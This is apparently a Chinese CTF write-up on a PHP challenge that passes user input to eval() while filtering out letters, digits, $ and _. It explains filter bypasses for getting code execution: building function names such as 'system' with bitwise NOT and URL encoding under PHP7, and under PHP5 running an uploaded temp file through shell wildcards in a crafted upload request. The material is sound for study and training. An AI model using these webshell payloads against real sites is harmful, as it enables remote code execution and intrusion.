无字母数字webshell命令执行

复制代码
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

限制:

1.webshell长度不超过35

2.正则过滤掉了数字字母还有$和_

php7环境:

取反

php中'~'表示取反,而取反之后大都是不可见字符

复制代码
<?php
var_dump(urlencode(~'system'));

取反后的值为%8C%86%8C%8B%9A%92

解码:

复制代码
<?php
var_dump(urlencode(~'phpinfo'));

答案如下:

php5环境:

通配符

用通配符来进行匹配,无法准确匹配

但我们要继续通配符

\^a\]表示这里不为a \[0-9\]表示0-9这个范围 而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用\[\]表示出大写字母就可以了 在ascii表中,大写字母处于@-\[之间,所以很明确了,使用/???/???????\[@-\[\]来进行匹配 执行: Document

写一个form表单上传文件到web.php,使用bp抓包,抓一个上传文件的包和web.php的包 ![](https://i-blog.csdnimg.cn/direct/aa866ef860624319a33769a58a1ec267.png) ![](https://i-blog.csdnimg.cn/direct/031663b524354a0d93e1ceb4c78a2554.png) 把第一个包的post内容放入web.php中 ![](https://i-blog.csdnimg.cn/direct/8072b8ca7ac749a8a33681d10d2c99f7.png) 发送请求 ![](https://i-blog.csdnimg.cn/direct/0a8fab9500094965b90eb324f27a9ac4.png) 结束

相关推荐
xdscode4 分钟前
SpringBoot ThreadLocal 全局动态变量设置
java·spring boot·threadlocal
lifallen7 分钟前
Paimon 原子提交实现
java·大数据·数据结构·数据库·后端·算法
天天扭码8 分钟前
很全面的前端面试——CSS篇(上)
前端·css·面试
lixzest8 分钟前
C++ Lambda 表达式详解
服务器·开发语言·c++·算法
EndingCoder11 分钟前
搜索算法在前端的实践
前端·算法·性能优化·状态模式·搜索算法
o不ok!14 分钟前
Linux面试问题-软件测试
linux·运维·服务器
丶小鱼丶14 分钟前
链表算法之【合并两个有序链表】
java·算法·链表
sunbyte15 分钟前
50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | DoubleVerticalSlider(双垂直滑块)
前端·javascript·css·vue.js·vue
Favor_Yang20 分钟前
SQL Server通过存储过程实现HTML页面生成
前端·信息可视化·sqlserver·存储过程
张先shen43 分钟前
Elasticsearch RESTful API入门:全文搜索实战(Java版)
java·大数据·elasticsearch·搜索引擎·全文检索·restful